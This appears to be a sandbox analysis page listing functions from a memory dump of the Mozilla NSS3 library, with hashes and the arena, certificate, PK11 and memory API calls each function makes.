Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: FindUtil
String ID:
API String ID: 2510446611-0
Opcode ID: 7242912d1333aef9f581f7b0a439cbdd35cbae094a47ef9b3e9f0d9f52f847fd
Instruction ID: 53e1d682103d88591c90aaa788403bb67f6f93ab88bd4ebbad640ec15753c4cf
Opcode Fuzzy Hash: 7242912d1333aef9f581f7b0a439cbdd35cbae094a47ef9b3e9f0d9f52f847fd
Instruction Fuzzy Hash: DD4106776017819BDB108A2A9B0470B73B5AFC976CF254539D82AC7F00EF32F4159AD2

Function 6C7D66C0 Relevance: 9.1, APIs: 6, Instructions: 132memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C7D66DF

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000168), ref: 6C7D66F9

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

memset.VCRUNTIME140(00000000,00000000,00000168), ref: 6C7D6728
PK11_GetInternalKeySlot.NSS3 ref: 6C7D6788
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C7D67AD
PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C7D67C1

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaUtil$Arena_Value$Alloc_AllocateCriticalEnterFreeInitInternalK11_LockOptionPoolSectionSlotUnlockcallocmemset
String ID:
API String ID: 3227582682-0
Opcode ID: f18a621e5eed40375b254ae739716dc609e755806b7a5d2c4ae61a04fd27d928
Instruction ID: b95b3365280ca3567df3a4d2594dbaa000c51028b8c077558d106a7dcabcdba2
Opcode Fuzzy Hash: f18a621e5eed40375b254ae739716dc609e755806b7a5d2c4ae61a04fd27d928
Instruction Fuzzy Hash: D65128B5D002188FDB40CF69CA857DA7BF4AB08718F05457AEC08EB745E775AA44CFA1

Function 6C7AEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C7AEF38

Part of subcall function 6C799520: PK11_IsLoggedIn.NSS3(00000000,?,6C7C379E,?,00000001,?), ref: 6C799542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C7AEF53

Part of subcall function 6C7B4C20: TlsGetValue.KERNEL32 ref: 6C7B4C4C
Part of subcall function 6C7B4C20: EnterCriticalSection.KERNEL32(?), ref: 6C7B4C60
Part of subcall function 6C7B4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CA1
Part of subcall function 6C7B4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CBE
Part of subcall function 6C7B4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CD2
Part of subcall function 6C7B4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4D3A

PR_GetCurrentThread.NSS3 ref: 6C7AEF9E

Part of subcall function 6C839BF0: TlsGetValue.KERNEL32(?,?,?,6C880A75), ref: 6C839C07

free.MOZGLUE(00000000), ref: 6C7AEFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7AF016
free.MOZGLUE(00000000), ref: 6C7AF022

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: f93a7f44fc8bca8d5e9ff4f3004b92a8dd31800c26dda5a6318abc1bca3bb6a6
Instruction ID: 9bdd7d257898780588dab47f6d8778b8eb44ce1930af9f0b0bca7065d0750c80
Opcode Fuzzy Hash: f93a7f44fc8bca8d5e9ff4f3004b92a8dd31800c26dda5a6318abc1bca3bb6a6
Instruction Fuzzy Hash: 8C4181B1E00209AFDF018FE9DD45AEF7BB9EB48358F004135F914A6351E771D9168BA1

Function 6C812640 Relevance: 9.1, APIs: 6, Instructions: 119COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,8B7874C0,?,?,?,00000000,?,?,?,6C7E99E8,00000000,00000000,?,?,?,?), ref: 6C81267E
memset.VCRUNTIME140(00000000,00000000,?,?,?,00000000,?,?,?,6C7E99E8,00000000,00000000,?,?,?,?), ref: 6C81269D
memcpy.VCRUNTIME140(00000000,8B7874C0,?,?,?,?,?,?,00000000,?,?,?,6C7E99E8,00000000,00000000,?), ref: 6C8126AC
PK11_AEADOp.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,6C7E99E8), ref: 6C812714
PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,?,?,?,6C7E99E8,00000000,00000000,?,?,?,?,?), ref: 6C812737
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C812750

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpy$ErrorK11_memset
String ID:
API String ID: 2328202073-0
Opcode ID: a945f38ff075258a09958584e252f753a4a16203d628d1f966e7cfba15663577
Instruction ID: 22bd73cb438da804a21099401e8c9b6617e97abd7d055b79ddbc6d1c42cd6ba5
Opcode Fuzzy Hash: a945f38ff075258a09958584e252f753a4a16203d628d1f966e7cfba15663577
Instruction Fuzzy Hash: F5418A32A0410DAFCF249EA8CD84AEE77B5FF89308F554528F91967A50D731EC54CB90

Function 6C7E0720 Relevance: 9.1, APIs: 6, Instructions: 116COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(6C7E175E,6C7E175E,?,?,6C7E2F23,6C7E175E,00000000,?,6C7E175E,00000000), ref: 6C7E0738

Part of subcall function 6C7D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C778298,?,?,?,6C76FCE5,?), ref: 6C7D07BF
Part of subcall function 6C7D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7D07E6
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D081B
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D0825

NSS_CMSSignedData_Destroy.NSS3(5304C483,6C7E175E,?,?,6C7E2F23,6C7E175E,00000000,?,6C7E175E,00000000), ref: 6C7E075C

Part of subcall function 6C7E3630: CERT_DestroyCertificate.NSS3(6C7E175E,?,6C7E175E,?,00000000,?,6C7E0761,5304C483,6C7E175E,?,?,6C7E2F23,6C7E175E,00000000,?,6C7E175E), ref: 6C7E3661
Part of subcall function 6C7E3630: CERT_DestroyCertificate.NSS3(6C7E175E,?,6C7E175E,?,00000000,?,6C7E0761,5304C483,6C7E175E,?,?,6C7E2F23,6C7E175E,00000000,?,6C7E175E), ref: 6C7E3681
Part of subcall function 6C7E3630: PORT_FreeArena_Util.NSS3(6C8CCA90,00000000,?,6C7E175E,?,00000000,?,6C7E0761,5304C483,6C7E175E,?,?,6C7E2F23,6C7E175E,00000000), ref: 6C7E36A5

PORT_ArenaUnmark_Util.NSS3(?,5304C483,6C7E175E,?,?,6C7E2F23,6C7E175E,00000000,?,6C7E175E,00000000), ref: 6C7E0794
free.MOZGLUE(850C478B,6C7E175E,00000000), ref: 6C7E07D0
PK11_FreeSymKey.NSS3(890473C1,6C7E175E,00000000), ref: 6C7E07E8

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DestroyUtil$CertificateErrorFreeHashLookupTable$ArenaArena_ConstData_FindK11_SignedUnmark_free
String ID:
API String ID: 4228047643-0
Opcode ID: 8e90044c3b7a41aa7e455db01c38565e9841647b913919f06d4e4121220a0e8a
Instruction ID: bac30fabda74af674031f79e7962ac2592b8235bd325acb45ed012f51554f8e7
Opcode Fuzzy Hash: 8e90044c3b7a41aa7e455db01c38565e9841647b913919f06d4e4121220a0e8a
Instruction Fuzzy Hash: 1A31D5B7A017819BEF108A7B9A48707B7A5BF48628F154138D82997F00EF31F4249FD2

Function 6C79CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C79CF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C79D002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C79D016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C79D025
PR_NewLock.NSS3 ref: 6C79D043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C79D074

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: df00ef3378ebffe5f59bbc8477ba2269a234ba212747add337c522fa98f8d0bb
Instruction ID: d885752772d619aa4e9e7f2209542304c151ccee161ede9bdb4d8f0d6d60f2f4
Opcode Fuzzy Hash: df00ef3378ebffe5f59bbc8477ba2269a234ba212747add337c522fa98f8d0bb
Instruction Fuzzy Hash: 3C41AEB1A012118FDB10DF2DEA8579ABBA4AF18318F10417ADC1D8BB46D774D885CBE5

Function 6C7865D0 Relevance: 9.1, APIs: 6, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(-00000007), ref: 6C78660F

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

free.MOZGLUE(00000000), ref: 6C786660
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C78667B
SGN_DecodeDigestInfo.NSS3(?), ref: 6C78669B
SECOID_GetAlgorithmTag_Util.NSS3(-00000004), ref: 6C7866B0
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C7866C8

Part of subcall function 6C7B25D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C78662E,?,?), ref: 6C7B2670
Part of subcall function 6C7B25D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C78662E,?), ref: 6C7B2684
Part of subcall function 6C7B25D0: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C7B26C2
Part of subcall function 6C7B25D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C7B26E0
Part of subcall function 6C7B25D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C7B26F4
Part of subcall function 6C7B25D0: PR_Unlock.NSS3(?), ref: 6C7B274D

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: UtilValue$CriticalEnterSectionUnlock$AlgorithmAlloc_Arena_DecodeDigestErrorFreeInfoTag_freemalloc
String ID:
API String ID: 2025608128-0
Opcode ID: 94d0c5eb104e4e13e557cfa2904b2277a56fb14b40fc1a25412881484e1a920e
Instruction ID: c12f3bee619dca69c6348557dbad1aea2e16ea3e0b338f17d4318e4b01071c42
Opcode Fuzzy Hash: 94d0c5eb104e4e13e557cfa2904b2277a56fb14b40fc1a25412881484e1a920e
Instruction Fuzzy Hash: CF3132B5A01259ABDB00CFA8D985AAE77F4AF49358F150038ED15EB705E731EA04CBA1

Function 6C782E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C772D1A), ref: 6C782E7E

Part of subcall function 6C7D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C778298,?,?,?,6C76FCE5,?), ref: 6C7D07BF
Part of subcall function 6C7D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7D07E6
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D081B
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D0825

PR_Now.NSS3 ref: 6C782EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C782EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C772D1A), ref: 6C782F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C772D1A), ref: 6C782F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C782F81

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: dbf33755e1961376bc859a043b8756a7964048b9a7f7e549ea18303b3a729a3b
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 6D31F3715031048BE710C665DE4CFAEB269EF8032AF64097AD629D7AD1EB31998AC621

Function 6C770E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C770A2C), ref: 6C770E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C770A2C), ref: 6C770E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C770A2C), ref: 6C770E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C770A2C), ref: 6C770E90
free.MOZGLUE(00000000), ref: 6C770EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C770A2C), ref: 6C770ED9

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 4ed24f95403d7d1f3338b0f6196521122ba794be8b197488ea45beffe448d5da
Instruction ID: a88ff40b3ba9b94c28d6beb844c16cad50cec65c02ce570d88ef1c2f9bb13ead
Opcode Fuzzy Hash: 4ed24f95403d7d1f3338b0f6196521122ba794be8b197488ea45beffe448d5da
Instruction Fuzzy Hash: F2212E72B0028C57EF3065769E49B6B72AEDBC1748F194035D81853B42EAE2D81482B1

Function 6C77AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C77AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C77AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C77AEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C77AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C899500), ref: 6C77AF23

Part of subcall function 6C7CF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C7CF0C8
Part of subcall function 6C7CF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7CF122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C77AF37

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: 185c613ea651363058e662ead888cc51e2dd6bd01095f9c0be3194c99d276fbc
Instruction ID: b5607a6d8b6eb8dd2ccc1709ca6656f1bb8f72ac2fed79c1be957535f1c222d7
Opcode Fuzzy Hash: 185c613ea651363058e662ead888cc51e2dd6bd01095f9c0be3194c99d276fbc
Instruction Fuzzy Hash: 062128B29092049BFF208E188E01B9A7BE4AF8573CF144728EC589B781E731D54887B3

Function 6C7FEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7FEE85
realloc.MOZGLUE(43BA18CD,?), ref: 6C7FEEAE
PORT_Alloc_Util.NSS3(?), ref: 6C7FEEC5

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

htonl.WSOCK32(?), ref: 6C7FEEE3
htonl.WSOCK32(00000000,?), ref: 6C7FEEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C7FEF01

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: 98070ecdae83e1dfc767fc94a3895d6bcc3d3d947fcd11721ae2fe30d4b76f36
Instruction ID: 3413cae97319cb2a6a91c7f58506d456fdd1338e72f39c4192caf87e500ddb5b
Opcode Fuzzy Hash: 98070ecdae83e1dfc767fc94a3895d6bcc3d3d947fcd11721ae2fe30d4b76f36
Instruction Fuzzy Hash: 5621D671A002189FDB209F28DDC475A77A8EF45358F158139EC199B741D330ED15C7E2

Function 6C7AEE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7AEE49

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7AEE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C7AEE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C7AEE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C7AEEB3

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: a5b26b4bfb7332f09be47131540e118198577f02cc4bd3e88d8f2258f1c3a253
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: F82105B6A04215ABEB019E58ED89EABB7ACEF45708F040274FD049B301E771DC2587F1

Function 6C7D2550 Relevance: 9.1, APIs: 6, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6C7D2576
PORT_Alloc_Util.NSS3(00000000), ref: 6C7D2585

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 6C7D25A1
_waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 6C7D25AF
